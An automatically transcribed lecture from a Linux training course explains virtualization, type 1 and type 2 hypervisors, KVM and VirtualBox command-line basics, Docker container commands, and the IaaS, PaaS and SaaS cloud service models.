need to talk about virtualization and cloud computing and this is not going to be the the Linux plus examination or at least the version that uh we mentioned at the top of this training series but they do upgrade and update their certification exams uh relatively uh frequently so uh for whenever this does get included as a part of the examination process I want you to be aware of these Concepts and even if they’re not covered in the exam it makes you a much better administrator when you understand what virtualization is and what cloud computing is and this is in no way limited to Linux but uh I think it is a very important topic to uh talk about especially when we are talking about deploying Linux and this was something that we actually did kind of go over as we uh went through the installation process um in chapter 3 and I was showing you how to boot something from a USB drive and how to install on a USB drive and how to uh reinstall a dual boot for example on your machine so that you can uh boot multiple uh versions of an operating system or different operating systems on the same machine so that all falls under virtualization and cloud computing is a little bit different but it’s kind of in the same ballpark obviously so uh just as an introduction to virtualization the first thing that we need to understand um is essentially if you if you think of your computer as a machine right or the computer that I’m recording this on or even your uh cell phone if you just consider all of these things as a machine and then we talk about the physical version of the machine or a virtual version of the machine so you could have a Windows machine be on a physical computer or you could have a Windows machine that would be a virtual computer a virtual machine and the way that we create the virtualization or the virtual version of it we would do it through virtualization and virtualization is just a technology that allows you to do it that to have multiple virtual machines running on a single physical machine and that physical machine could be something as simple as somebody’s home computer or it could be a meas sized uh server that was created at Amazon AWS or on Google cloud or Microsoft Azure cloud or any of those things right so um it’s overall the same concept it’s just different sizes of physical machines that end up hosting these uh the variety of virtual machines so uh this particular approach this concept of virtualization uh improves the use of resources uh it gives you isolated environments for a variety of different purposes so to create different applications or operating systems or test environments or anything along those lines it’s all very very powerful to use virtualization for those Concepts so uh this is essentially where virtualization is and then there are a few key Concepts that we need to to make sure that you really wrap your head around so as we as I already mentioned virtual machines are basically simulations of physical computers right so you can have a software based version of a physical computer that could live on a USB drive that could be boot booted from a USB drive it could be booted from a cloud service provider it could be booted from your actual computer that you’re watching this video on and uh that it’s basically what it is it’s just a simulation of an actual computer right the operating system of Windows or Mac OS or uh Linux or so on and so forth uh each virtual machine runs its own OS and the applications inside of that OS and they’re all independent from each other that would be on the same physical host so you can have one physical host that has a 100 VMS running on it or a thousand VMS running on it in the case of a mega server that exists at uh you know some Enterprise locations that they haven’t in their own building or they buy it from a cloud service provider right um there is isolation meaning that the failure or compromise of one VM will not affect the others or if you wanted to test something in an isolated environment you could boot up a virtual machine test it on that machine make sure everything’s all good if it crashes who cares because it’s that One Singular virtual machine and you you literally take it down as quickly and easily as you put it up and you can just keep keep testing until it’s actually ready and then you would deploy to the rest of your environment in your Enterprise or uh you just isolate each one of these things against each other for security purposes so in case something happens one machine crashing doesn’t affect the rest of your environment and your network so uh this is the overall understanding and the concept of virtual machines now there’s something that helps you deploy and create and manage virtual machines and that is the hypervisor and the hypervisor is basically a software or a firmware so to speak um depending on the type of hypervisor that you’re using but it essentially serves the same purpose right it helps you to create and manage and deploy and take down virtual machines that’s basically what it does and then with that hypervisor you allocate the amount of resources that will be uh designated to any one of these virtual machines and keep them separate from each other keep them isolated from each other that’s what the hypervisor does so it helps you boot them up deploy them and then allocate how much resources each one should take on that physical machine that they’re running on and then keep them all separate from each other the first type of hypervisor is known as the bare metal hypervisor and I’ll give you a visual so that you kind of understand the difference between the two uh so we have the type one which is known as the bare metal that runs directly on the actual physical Hardware so the CPU the motherboard the Ram uh the power source everything else right so anything that is required to build a computer physically the physical requirements of that computer the hypervisor sits on top of that and then from the hypervisor you boot a bunch of different uh virtual machines and it doesn’t require a host operating system so I’ll explain what that means when we actually get to the second type so it doesn’t require host operating system it just sits right on top of the physical hardware and uh from there you can boot all of the operating systems or applications or everything else that you would run inside of your environment and you would do that through the use of this particular hypervisor um this is more uh focused on performance so this is the higher performing version of a hypervisor because it is sitting directly on top of the physical hardware and it’s very very common in Enterprise environments or environments that have hundreds if not thousands of employees that they need to provide machines to they need to provide computers to the examples here are these are the actual hypervisors that are considered bare metal so the VMware SK or ESC I guess I I don’t know if that’s how you pronounce it um esxi whatever so the VMware version uh it’s very widely used in Enterprise environments it supports a lot of different features for managing virtual machines we have the Microsoft hyperv which is also another powerful hyper uh hypervisor that’s includes with the Windows server and it provides comprehens comprehensive virtualization capabilities and then there’s Zen which is the open source version of the bare metal hypervisor um that’s known for scalability which means it essentially you can use it in an Enterprise environment if they have limited budgets um and it’s still very secure and it’s a notable mention so it’s a good enough uh uh a hypervisor that even though it’s open source it’s still very useful in a large production environment then we have the type 2 hypervisor which is known as the hosted hypervisor and this runs on top of your actual operating system on your computer so imagine if you’re watching this on a computer or let’s say the Mac computer that I’m running this on so the computer that I’m on would act as the host and then we would install one of the hypervisor softwares on here and then with the use of that hypervisor I would deploy multiple virtual machines and it would all use the same resources that is inside of my MacBook or inside of my Mac operating system whatever it is right so if my MacBook has 8 GB of RAM all of the various virtual machines would rely on that 8 gabes of ram that’s on my actual computer right and so this is what it means to have a hosted hypervisor the computer serves as the host and then you’re using the resources of that computer and then the computer has its own operating system so it could be a Mac it could be a Windows anything else it could H it has its own operating system that computer that’s already running as an OS serves as the host and then on top of that you would have the hypervisor that helps you deploy the various virtual machines or applications so on and so forth and this is mostly used for desktop virtualization or uh smaller environment so this is not something that you would do with a thousand employees right it’s typically uh a much smaller scale version of running a uh hypervisor or a virtual type of an environment and it just depends on the resources of the main computer that host computer um the virtual box would be one of the most common ones you’ve probably heard of this because it’s an open source hypervisor that’s used a lot to deploy guest operating systems so if you have your computer being the host everything else would be the guest OS and the guest VM and it’s very very easy to deploy it using virtual box you just download it and then you start deploying as long as you have the iso image as we kind of went over inside of the installation process of chapter 3 you can essentially run uh as many virtual machines as your computer would allow based on its uh resources based on its hardware and uh the the processing power um VM workstation is the commercial hypervisor version of this and uh it basically does the same thing so it is a it’s for a hosted environment and it runs and man uh manages multiple VMS on a desktop computer um of course if it is inside of a commercial environment you would need a much faster uh host computer than something that runs on 8 or 16 GB of RAM with a you know basic CPU so it does still need to be a strong enough computer it’s going to be if it’s going to be used inside of a virtual environment or inside of a commercial environment excuse me to virtualize uh you know over a dozen VMS for example um the last one would be the Parallels Desktop which is designed for Mac OS specifically uh which allows you to run Windows and other operating systems on top of a Mac OS computer and uh of course Mac OS would need its own dedicated hypervisor so Parallels Desktop would serve as the hypervisor that can work on top of a Mac OS computer so there are a lot of advantages to do doing this uh I’m going to go over three main categories or maybe four main categories but uh depending on who you ask there’s an abundance of advantages to virtualization uh the first one would be the efficiency of the usage of the resource and how quickly you can scale up or scale down so um because you can use the same physical resources it’s efficient right you’re you’re not using a lot of money uh to buy 25 computers you can just launch 25 virtual machines from this same hardware and then from there just connect them to monitors keyboards and mouses and each one of those dummy computers we call them dummy computers or uh you can techn technically I think they’re called terminals uh you can use you know 25 terminals that don’t have any hardware they’re just connected to the main physical processor which is the massive uh or the the powerful let’s say let’s say it’s not massive but it’s like a very powerful Central Computer with all of the physical hardware and then that connects to the 25 different terminals that 25 different employees can use and then when you hire somebody or get rid of somebody you don’t have to worry about selling the computer or If you hired a new person you don’t have to buy a new computer you can just launch from that same physical resource and just have a keyboard and a mouse and a a monitor you know what I mean so it’s just much more cost effective the cost of Hardware is way less when you do virtualization instead of having to buy 25 individual computers so that’s the one piece and then the other piece is the scaling up and scaling down portion that you know you uh fire half of your people you don’t need to worry about getting rid of half of your computers you can just delete the half of the virtual machines that are currently deployed on your hypervisor and it’s as easy as selecting them and clicking delete and it’s it’s not complicated to scale up or down using virtualization the next one would be isolating and the connection of isolation to security so these two pieces actually go hand in hand so because of the fact that each virtual machine operates independently so it’s actually operating as its own computer um as long as the usernames and passwords are strong if one of them gets hacked into or fails right so if if a computer fails it doesn’t affect the rest of the network you can just reboot one and launch another one and you should be all good uh if that person gets hacked as as long as their password is strong or as long as the passwords of the rest of the people on your network are strong then whatever ransomware or virus or anything else that’s installed on that particular VM will not affect the rest of the computers because it is literally isolated as its own computer and it’s as if just that one if it’s one physical computer for example if that one physical computer gets hacked then the rest of the physical computers in the network won’t be affected and it’s literally the same thing because each one of the virtual VMS each one of these VMS is essentially a computer separate by itself so it’s isolated in its own environment and if it gets hacked if it crashes if anything happens then it won’t affect the rest of the computers that are on your network so isolation and security actually go hand in hand when you can isolate a compromised machine from the rest of your network that means you’re protecting the rest of your network then there’s the flexibility and Agility of testing and deploying and developing so because you can quickly deploy meaning if somebody new comes in literally you just go through the same uh installation process on your hypervisor using the same ISO and just deploy a new virtual machine and then you can connect that virtual machine to one of the terminals that already exist and just give that person their own username and password and you know when the other employee that was using that uh original terminal if they’re not working that day or if they’re working on separate schedules or something like that they could essentially be running uh their own VMS from that same exact terminal as long as they have their own login information their own dedicated login credentials um and then testing and developing is again another one of these easy things because it’s an isolated environment so if you wanted to test a new product launch or a new software launch and you wanted to make sure that it doesn’t affect the rest of your network then you would do it with a virtual machine test it make sure everything is all good and do any uh extra configurations or development that you need to and then from there once everything’s all good and all your eyes are crossed and or eyes are crossed all your all your te’s are crossed and your eyes are dotted once all of that’s done then you can deploy it to the rest of your environment and make sure all the other computers have it so it’s very flexible it’s very agile you can scale up or scale down as needed very quickly without having to buy new machines or sell the current machines and uh if you add 10 new employees for your night shift then they can all use the same exact terminals just get their own login credentials and that’s it it’s like it’s very very simple and easy to do and finally there’s the disaster recovery portion of it that um you know so let’s go back to the the concept of having 25 physical machines right so if you wanted to take a snapshot a backup of 25 physical machines then instead of having to plug each machine into an external hard drive and then run whatever software you would use to back up that uh computer’s contents on the the external hard drive you would just go to your hypervisor you would select all so select all of the machines and then run the backup within the hypervisor and then go to lunch and come back and all of the contents of all of those 25 virtual machines have been backed up on your external hard drive and if you can think about it so if we go back to the file system hierarchy that we reviewed at the very beginning of this training series and you you consider that you know every computer technically is just a massive file system and it has the root folder the root directory and inside of the root directory there’s a bunch of primary uh directories and then those primary directories are extended into a bunch of other directories and then those directories contain a bunch of files and folders and so on and so forth so when you think about it as a large file basically right so you have one root file and inside of that file there’s a bunch of other files folders when you think about it that way it’s basically as simple as copy pasting right so that’s what it’s like when you have a virtualized environment you click on one little line item inside of the hypervisor and that represents a computer and all of the contents of that hypervisor or all of that VM would be backed up using that hypervisor and it’s so simple to do so it’s it’s much much simpler process than having to back up 25 physical machines so this is one of the probably one of the biggest advant as far as convenience is concerned it’s one of the biggest advantages of using virtual machines and if there’s any disaster or you you lose your power or the building burns down or something like that it’s like all of these things are stored inside of this one virtualized environment that can easily be accessed especially if you’ve developed redundancies which is very important in security and disaster recovery and you have multiple locations that are connected to that same hypervisor and then if one Lo goes through an earthquake that means they’re all good that you can still launch all of those computers all of those virtual machines because you have these redundancies that are essentially connected to the same hypervisor the same virtual environment so very very powerful concept and uh as a summary really what we need to understand is that there are two types of hypervisors so if you know what a virtualization is and if you understand the concept of virtual machine you need to understand that there are two types of hypervisors we have the type one and then type two type one sits on top of the physical infrastructure type two sits on top of a already running computer which is would be the host computer and then from there you would deploy your virtual machines but I do want to show you this visual because I really believe that visuals actually help kind of uh embed Concepts into your brain and really drive the point home so uh let me just show you this real quick so this is a very simple visual representation of the types of hypervisor so we have the type 1 hypervisor on the left side here and this is the hardware so the CPU the motherboard the RAM and the graphics card and the power source and everything else that represents the hardware that is required for a computer to run and then on top of the hardware is the hypervisor so there is no operating system it’s just a hypervisor that is the type one the bare metal hypervisor and then from this hypervisor you launch all of the various uh web applications or applications or operating systems to terminal computer so on and so forth so it’s kind of simple and you can see how the this is more efficient and more uh performance driven because there is no operating system on top of the hardware it’s just the hypervisor that is deploying these various operating systems and then the type two would be my laptop for example or your computer that would be the type two where it has the hardware and then on top of the hardware is a Windows operating system that’s being used as a main computer or a Mac operating system operating as a main computer and then you have downloaded the hypervisor as a software and that hypervisor helps you launch these various operating systems or these various virtual machines and that’s basically it there’s it’s it doesn’t go any deeper than this right so the the details from here on would be okay what hypervisor are you using and how do you use it or are you going to use a cloud service provider to be acting as your hypervisor technically and then you’re borrowing or you’re renting their infrastructure from their massive uh server rooms and their data uh centers and so on and so forth and then you’re just using their interface to launch your virtual machines and then you’re going to give your employees their login and they’ll they’ll access it from their computer or is that how you’re going to do it or you know what I mean it that’s where the details kind of come in but for the overall concept that’s basically it right so if you if you are going to rent services from a cloud service provider you’re technically going to be in a hosted environment which would be this place and then you’re going to log into your web browser and that would be done from your operating system from your current computer you would log into a web browser and then you would go into Google cloud and then you would deploy 100 virtual machines using the hypervisor that is uh from Google cloud and then from there for each one of those virtual machines you would get an IP address or a login link basically and then for that login link there’s going to be a username and password that would be given to a person and then that person from their computer would get access to that particular virtual machine or web application and that’s basically it that’s really as deep as you need to kind of go into to be able to understand how Cloud environments work and how virtual machines work once we get that then we can kind of go into the nitty-gritty and be like okay this cloud service provider does this and this one does this this and so but it’s all essentially the same concept just in a little bit more nuanced of an approach so that’s it that’s the difference between a type 1 and a type 2 hypervisor if we wanted to look at different versions of type 1 hypervisors for example the KVM the kernel-based virtual machine would act as a type one hypervisor and is integrated directly into the Linux kernel it sits right on top of the physical hardware and it transforms the Linux operating system into a very powerful and efficient virtualization host capable of running multiple VMS with various guest operating systems and this is typically done in a a server type of an environment so um we can integrate the KVM with the Linux kernel um as you already know what the kernel is it connects the user to the actual physical infrastructure and makes it highly efficient and able to leverage the existing Linux infrastructure it in allows the the KVM to take advantage of the features of Linux like the memory management process scheduling input output handling robust performance and scalability all of that stuff falls under using something like the KVM or just the KVM itself um it also helps you allocate the resources very easily and efficiently so to speak um it uses the hardware assisted virtualization which is what a type 1 hypervisor is and it’s it’s supported by the processors with uh Intel virtualization or amdv technology and these are essentially the hardware uh AMD for example amdv uh you should recognize AMD just by the name because they create really awesome graphics cards and Intel also creates graphics cards and computer chips and things like that so um the KVM uses uh Hardware that is supported by processors from Intel or AMD and we’re talking about physical processors computer processors so this Hardware support allows the KVM to efficiently allocate resources like CPU memory and input output usage to Virtual machines ensuring that the performance and overhead is all matched up as it’s supposed to be and it’s all balanced out but basically kernel Bas virtual machine KVM is a type 1 hypervisor that sits on top of the physical computer and then from there you would launch a variety of different virtual machines um it has a lot of support for various operating systems meaning that you can actually launch Windows and Linux and BSD and these various types of operating systems from the KVM so it is compatible with variety of operating systems and it’s runs its own OS so uh each virtual machine would run its own OS basically and it would be configured with the hardware specifications like for example how much CPU will it use how much RAM is it going to get how much storage is it going to get so on and so forth so again the same thing that is done with a type 1 hypervisor it’s just this specific one is of notes for what we’re talking about because it works with Linux it is a Linux uh virtual machine manager Linux hypervisor but it is compatible with Windows and Linux as well as any other operating system that you would want to install for your virtual machines ver is the command line tool the command line interface that interacts with KVM so this is essentially the interace that you would use to manage the KVM based VMS KVM based VMS that’s like a kind of a tongue twister um it’s a part of the lib vert virtualization toolkit which provides the API to interact with hypervisors including KVM as well as a variety of different hypervisors so verse is the command line interface to interact with KVM to be able to deploy your virtual machines if you want to start a virtual machine via the command line using Verge this is basically it so you would run verse start and then the name of the VM or whatever the VM name that youve designated previously and it would just start that virtual machine up right and replace it as you can kind of this is like very intuitive it’s a very uh easy to understand command line so you run the command start and then you just give it the name of the VM so that it actually starts DVM uh for example this would be something that the name of the computer would be my virtual machine and you just say verse start my virtual machine and then you can list the running virtual machines using list so ver list very very simple to understand right so it would list all the currently running virtual machines uh displaying the IDS the names and the states that they are currently in and this is what an example output of that would look like so this in this particular case there’s two virtual machines there is my virtual machine and another VM and they’re both running very very simple to understand stand easy to understand if you want to shut something down then you would just use the shut down so the opposite of start you shut it down it reminds me of Kevin Hart I’m hey shut it down um so you would use verse shutdown and then give it the VM name and then it would just shut down gracefully I love this portion it gracefully shuts down that virtual machine uh making sure that everything is all good and this would be the example of it um using the my virtual machine name so verse shut down on my virtual machine um these are a couple of examples as again just to kind of reing grain this all in your head the start command would start up the virtual machine so in this case it would be the Ubuntu VM that we’re starting if we wanted to list the virtual machines you would use ver list and it displays all the currently running virtual machines on your screen and then shut down the virtual machine would be done uh to stop the virtual machine from running so verse shutdown ubun 2vm would stop the UB Bo 2vm from running so KVM is the type 1 hypervisor that’s integrated into the Linux kernel um it enables virtualization on Linux hosts um and then you can run multiple VMS uh with a variety of different operating systems and these are our basic commands so start a VM run the VM or view the the running VMS and then stop the VM to uh deploy the virtual machines using KVM is going to be out side of the scope of this particular interaction I just want you to know that the tool that is used to interact with ver would be or excuse me to interact with KVM to kernel-based virtual machine to interact with that you would be using the Verge command line and then from there the the commands are as simple as starting something that’s been deployed using that particular hypervisor which is KVM so the KVM hypervisor would be the one that would give you the name of the virtual machine for example and then from there you would uh start it stop it list what you have available so on and so forth virtual box is another really commonly used widely used type 2 hypervisor so as we reviewed our hypervisors this one is going to sit on top of a host machine uh it’s been developed by Oracle it’s very popular because it’s compatible with a different operating systems like Linux Windows Mac OS and it’s commonly used for testing and deploying environments um uh testing and development environments excuse me um it provides the easy to setup and flexible platform because it’s I mean it’s literally like running any software and you can go through the prompts and The Wizard for the installation to run multiple operating systems on a single machine uh some of the key features is that it has compatibility with a variety of platforms so you can actually run it on a variety of host operating systems uh which makes it versatile to use on different platforms you can uh run a bunch of guest operating system sys meaning Windows Linux Mac OS Solaris and others so it’s cross compatible right it’s Closs platform compatible you can run it on uh windows or Linux to launch Windows or Linux right it’s compatible across the various platforms very easy to use as I mentioned it’s as simple as doing a couple of clicks to download the install files and then actually installing it and then once you have it installed you would use the GUI the graphic user interface to to just go through the prompts and click the various buttons that you would need to uh start up a new virtual machine and there’s a lot of documentation that’s available for virtual BLX because the fact that it is one of the most commonly used tools for virtualization the one of the most commonly used hypervisors and if you really want to be nerdy about it you can actually use the command line interface for management and automation for scripting and a variety of different tasks uh if you really want to get good at virtual box and just virtualization in general which I recommend that you do uh I would recommend to go look into it um I’m not going to go deep into the virtual box uh command line and it’s use case but there’s a lot of tutorials available and maybe in a future video I will if there’s enough people that want to see it I may just create a video using virtual box because again it’s just one of the most commonly used tools to virtualize VMS um some of the key features here that we have this snapshot functionality so it allows you to take snapshots of the current state of a VM so meaning that you actually can take backups of the computer very easily as I mentioned earlier it’s as easy as clicking on one of the virtual machines in the list of VMS that you have and then just taking a snapshot of it meaning backing up its content so it’s very very useful and very easy to create uh virtual images so to speak or a snapshot of a virtual machine to have it as your backup uh you can have guest additions meaning uh there are tools that you can use um to enhance the performance and usability of the guest operating system so you can improve the graphics for example of an operating system you can have shared folders between all of your operating systems or you can have a mouse integration which is I mean that one’s kind of a gimme but uh the shared folders part is very important to be able to improve the graphics of a operating system is also very very cool to be able to do just from your virtual box from your virtualization hypervisor so that’s a very cool little feature and for the Nerds vbox manage is the command line interface for managing virtual boox VMS so uh this is basically the the platform the command line interface that you would use to virtualize machines via the command line or to create scripts for virtualizing machines which is where the the the scalability comes in in a a easy convenient type of a format when you learn how to script and you can launch you know a dozen machines with the use of a uh a script that was done it’s I mean it’s it makes it even easier to virtualize VMS so uh vbox manage is actually the CLI the command line interface to launch virtual machines so uh vbox manage start VM VM name so this is a little bit uh more of a mouthful than verse but basically the the same concept right so you would uh call on the vbox manage tool and then start VM and then give it the VM name which would be the name of the virtual machine so as an example ubun 2vm would be the name of the virtual machine so you would just say Rebox manage start VM ubun to VM uh if you wanted to list them same thing list VMS very very simple um instead of verse list this is vbuck manage list VMS so as it’s kind of as simple as just using verse and then it would just list all of the vmss that are registered with virtual box and it displays their names their uu IDs and so on and so forth if you wanted to look at the output as an example this is what it looks like so you have the Ubuntu VM and the Windows 10 VM so we have a Linux VM here as well as a Windows VM and Microsoft and these are The UU IDs that are associated with these virtual machines that we’ve launched using virtual box so if you box manage control VM VM name power off again more of a mouthful than using the Verge command but this forces the specified VM to power off so you would replace it with the name of the VM that you want to turn off vbox manage control VM VM name power off this would be the example so ubun to VM being powered off and this is what we would do to do that so A couple of examples just to kind of review these commands that we have so vbox manage start VM Deb and VM would start the DN VM list the VMS with list all of the registered VMS with their names and their uu IDs the stopping of a VM will be done with control VM give it the name of the virtual machine and then give it the power off command and in summary we have the vbox manage commands for managing VMS at the bottom right here and uh we have the reference of virtual box which is I would say probably one of the most HP popular if not the most popular type 2 hypervisor that’s super super easy to download install and then it’s very flexible because you can run multiple operating systems on a single computer and it’s used for testing development and a variety of different tasks because it’s so compatible with various hosts and guest operating system so again it has cross compa compatibility between the host operating system and the guest operating system which makes it again one of the most popular hypervisors that exists on the market doc ERS and containers are The Replacements that we have for file systems and uh partitions essentially so a doer is a popular popular containerization tool that enables us to package applications and their dependencies into uh portable containers essentially um these containers can run consistently across different environments ensuring that the application behaves the same regardless of where it’s being deployed so you have have a container a compartment so to speak that includes a variety of different applications and all of the dependencies for that application to run and then you can launch this Docker uh within a Windows computer a Linux computer or so on and so forth and this would be all done through the virtualized environment right so this is something that a virtual machine would have access to so a container versus the virtual machine itself if you have to think about the comparison between the two uh containers are the isolated environments that share the host operating systems kernel they’re lightweight fast to start and they don’t require a full operating system okay containers include everything needed to run the application like the code the runtime Etc but it’s not an actual virtual machine so the virtual machine is not the uh or excuse me the container is not the OS right so it’s an isolated environment that shares the OS and then it has the application and the dependencies that would need it to run right so the virtual machine is the OS the container is the environment that is using that OS okay so uh you can have uh and so as as the comparison here we also have the virtual machine that is running on the hypervisor and includes the OS right so the container would run on the virtual machine essentially that’s what it is so a container hosts the application it hosts the dependencies so on and so forth but it needs to run on something so it would run on the operating system that’s provided by the virtual machine or it would run on the host operating system that would be your computer for example each VM operates independently with its own OS which increases resource usage as we’ve already established containers don’t run their own OS so they’re more lightweight and they’re faster to run um when you have a Docker container right so the docker and the containers within that Docker essentially they run on anything that can actually support Docker which means that they’re consistent across development testing and production environments uh they’re isolated so you can manage the file system or process everything that goes on within that file system uh on the variety of different operating systems that they will be running on um which means that you can have multiple applications run on the same host without interfering with each other so this is really just a fancy way of saying that you can compartmentalize a group of applications or a series of applications from each other you can separate them from each other run them separate of each other but they would be running on the same host right so they’re portable meaning that they can essentially be transferred via an email or a file share and then they can be isolated they can run on themselves or by themselves excuse me without uh interfering with each other and then uh they will run on the same host they would run on the same host operating system and they’re isolated right so they’re portable and they can be isolated the benefits are many um they’re efficient so they’re lightweight as we mentioned they don’t use as many resources from the hardware or the operating system and it can start at pretty much like you’re starting up a piece of software because that’s kind of what they’re like um they’re scalable meaning that they can be easily scaled up or down based on the demand they can be shared with a variety of different uh operating systems um and they’re very uh they’re ideal for micro services or Cloud native applications and that’s really where they come into play is the cloud environment because Cloud providers uh offer these Dockers and these containers and the software that is installed within them the applications that are installed with them are provided from the cloud service provider and uh you can essentially download it and install it into your virtual machine fairly easily or download it and install it to a 100 of your virtual machines fairly easily because they’re very compatible and they can scale up or scale down um to be able to run one you would use the docker command so the docker is the tool that will run the image of one of the containers that would run one of the containers ERS so the it option allows you to interact with the container via the terminal so you say Docker run interact with this particular image name and then you would replace the image name with the image or the the name of the various container tools uh that you would want to run so as an example you run Ubuntu right so again you’re running Ubuntu as a software technically as an application you’re not running it as an operating system system and that’s why it’s faster to run and it’s using the resources of the host operating system to run it so this is not uh running Ubuntu as an operating system it’s running it as a container which is using your host operating system your computer which is why again this is very native to Cloud environments because when you’re using a cloud environment you’re technically using a type 2 hypervisor which uses your computer’s resources to launch Ubuntu for example right then you have PS to actually list the containers that you have available so it’ll list all the currently running containers displaying their IDs names statuses and more and this is something that is done inside of the cloud command line and this is what it looks like so you have the container ID the image meaning what is actually running um the command uh interface for it which is a bash interface in this case it was created 2 hours ago it was uh up for 2 hours and there are no ports for it and the name is awesome Wing that’s been assigned to it and that’s it that’s what it looks like if you wanted to stop that exact container you would just do stop container ID and then give it the container ID or the container image name in this particular case but H what we’re talking about is this ID so this would be the container ID that you need to give it to stop that container from from running to stop that image from running this is what it looks like to Docker stop and then you give it the ID and just like that it it stops that container from running if you want to pull an image and so pulling an image meaning downloading the specified Docker image from Docker to your actual computer to the local machine your host computer that you’re running it on you would use Docker pull and then give it the image name so for example pull Ubuntu or pull in Jinx in this case it pulls the latest inin image from the docker Hub onto your computer and the docker Hub is the location where everything is listed inside of the cloud service provider that you can uh either install on your virtual machines or run from the cloud service provider or just download onto your local computer right so dockerhub is the location where all of these the variety of Ubuntu and in Jinx and the all of the different images so to speak of these containers are all stored and then from there you would either run them or download them onto your computer or you can install them on your virtual machines if you want to remove something it’s as simple as using the remove command so RM removes that container or the the stopped container right so you actually have to stop the container first and then from there you would remove it from your list of containers it’s fairly simple it’s like very intuitive um you need to give it the ID so as we already mentioned this is how you stop one and when you stop one you can use the same ID to remove it and then if you wanted to remove an image of something you would just use RMI so if you use the RM command by itself you need to give it the ID of the container in this particular case if you wanted to use the image name cuz it’s much it’s a more convenient thing to use the image name instead of the ID itself unless you’re going to copy paste for example but if you just want to remove it by its image name you just do RMI and then give it the image name and then it will remove that specified duck or image and then the same thing example would be here right so Ubuntu is much easier than this ID number for example so you just do RMI Ubuntu and then it’ll remove the Ubuntu image from your local machine so in summary we have the simplification of creating deploying and running applications in isolated containers that’s what basically the docker does right so the application is stored inside a container and then you would use Docker to deploy it or to create one or to download it onto your local machine or to run it or to stop it so on and so forth so Docker is the source that you use to interact with the various containers and then inside of those containers could be a variety of different things so it could be applications it could be what you saw technically as that Ubuntu image that was running running which is technically not its own operating system cuz it’s still running on top of your host operating system which is your computer so it’s more lightwe to do it this way so it’s faster to run them uh compared to traditional virtual machines cuz when you actually start a virtual machine uh it takes up a little bit more time and it takes up more resources uh because it’s a little bit more heavy duty uh than running just a container that has that specific series of applications that you’re looking for for it to run so again not an operating system you’re not launching the Ubuntu operating system you’re launching the variety of applications that would be stored inside of that one container that resembles what it would be like to launch Ubuntu as the operating system right but again it’s not running the actual operating system cuz your host operating system on your computer acts as the OS and then the container has the ninx server in it and the the applications and dependencies that would be connected to running an engine server and then you just launch it and now you have your engine server up and this is your cheat sheet of the commands that we just talked about so if you wanted to take a screenshot of this or uh jot it down you could pause the screen or take a screenshot of the screen one two three and moving on now we’ve talked about virtualization and virtual machines and Dockers and containers and all that good stuff now we can talk about Cloud Administration because essentially this is what virtualization is you are dealing with the cloud with virtual machines and virtual computers so cloud computing it’s the technology that provides OnDemand access to Computing over the Internet so on demand access to Virtual machines or Dockers or containers so on and so forth uh it includes servers storage databases networking software and a variety of other things and you can provision them and manage them with the click of a button and cloud computing allows businesses and or individuals to leverage these powerful resources without the need for physical Hardware or extensive it infrastructure which is what makes it so freaking popular so the infrastructure as a service is the first one and infrastructure as a service is something that’s provided as it says as a service and it’s provided from a cloud service provider so infrastructure as a service is the virtualized hardware resources like uh which is virtual machines for example storage networks which allows the user to deploy and manage operating systems applications and development environments so this is infostructure as a service uh the example would be AWS ec2 and AWS has a variety of different Services under their umbrella of services ec2 is the compute capacity in the cloud and enabling users to run applications on Virtual servers that’s what their version of IAS infrastructure as a service is the next one is Microsoft Azure virtual machines which is the uh essentially the equivalent of aws’s ec2 and it provides a range of virtual machine sizes configurations which support both windows and Linux operating systems and then we have the Google compute engine which is the Google version of this whole thing which is essentially offering the same thing uh scalable flexible compute resources for running large scale workloads on Google’s infrastructure and then you have platform as a service platform as a service would be the next level up so if we looked at infrastructure as a service as the base level because they’re providing the infrastructure platform as a service is the development and deployment environment in the cloud so it provides you with the tools and services to build test deploy and manage applications without worrying about the underlying infrastructure so for example the virtual machines and the physical Hardware that’s required you’re just using their platform to develop your applications to deploy and test your applications so on and so forth so it’s the next level up from buying infrastructure or renting infrastructure uh the elastic beant stock would be the AWS version of this um which helps you develop and scale and deploy web applications and services using popular languages Google app engine is the Google version of this that helps you deploy applications on Google’s infrastructure without automatically uh with automatic scaling excuse me automatic scaling and management and then we have the Microsoft Azure version which is the Microsoft Azure app service that helps you uh develop help developers build deploy and scale uh web apps and apis quickly with the integrated support for various development languages so on and so forth so basically these three companies essentially offer the same exact thing across the board uh the platforms have different interfaces to use they uh some of them are more userfriendly than the other ones but for the most part they offer similar services for everybody then you have the software as a service so if we were to look at infrastructure as the base level platform would be the next level software would be the next level as well which would be the application over the internet on a subscription BAS so you can access these via a web browser without the need for installing or maintaining anything you’re just log into any of these companies so Microsoft Office 365 is like one of the most com uh common ones it’s access to Microsoft Office like word excel PowerPoint so on and so forth and you it’s very similar to Google uh drive right so Google Drive would be another one of those things where it’s kind of the software as a service you get access to Google Sheets and you get access to Google Docs and so on and so forth and that’s you’re using the software now right right the the software is the word editor the software is the spreadsheet Creator editor and that’s what that is and with the connection with these things to one drive and teams so teams would be the sharing portion of Office 365 and one drive is the storage portion of Office 365 which again is very similar to Google uh Google Drive excuse me um Google workspace is the software as a service that kind of combines everything together right so you have the productivity collaboration because you’re now working with your uh co-workers and everybody that’s on your team and inside of this would be Gmail Google Drive doc sheets and Google meet which would be their video uh chatting video conferencing and then Salesforce which is a really big one um it’s a customer relationship management so which is a CRM tool and it helps businesses manage their customer relationships streamline s processes so on and so forth and Salesforce again is a software and it’s actually available on most cloud service providers as well and you can buy a license to it and have it installed on everybody’s local computer so that would kind of be another version of the software as a service so cloud computing as we’ve discussed in multiple instances so far under this uh particular chapter it helps you scale up or scale down right so based on the demands of your uh company you can get a bunch of different softwares deployed to all of your users all of your employees you can have a bunch of different virtual machines launched using the infrastr infrastructure as a service you can have uh the platform launch as well for them to be able to develop code and run uh or test their uh uh Cloud resources or test their applications that they’ve developed so on and so forth and you can do this up or down meaning as your company grows or as your company shrinks and downsizes you can add things with the click of a button or you can remove things with the click of a button very easily scalable in both directions and it’s coste efficient so this is this is one of the big things that companies are like uh one of the main reasons why they go into cloud computing because literally I mean for $20 for $30 a month you can start uh launching something for whatever environment for as much power and processing as you would need instead of buying a $5,000 computer you know what I mean depending on what you’re looking for depending on what you would need the cost The Upfront cost is so much cheaper and then you know when you don’t need it anymore instead of worrying about what to do with that $5,000 computer you just stop paying for the thing and let’s say you used it for 6 months and you don’t need it anymore and now you stop paying for it and you just turn it take it down you know what I mean it’s it’s in the grand scheme of things it’s so much more efficient cost-wise to use cloud computing for a Compu uh for a company especially maybe not for a person just depending on who you are as a person and what you do and what you you need it for maybe you do need it but for the most part for comp companies it’s kind of it’s kind of a no-brainer to go into cloud computing uh to use their services um 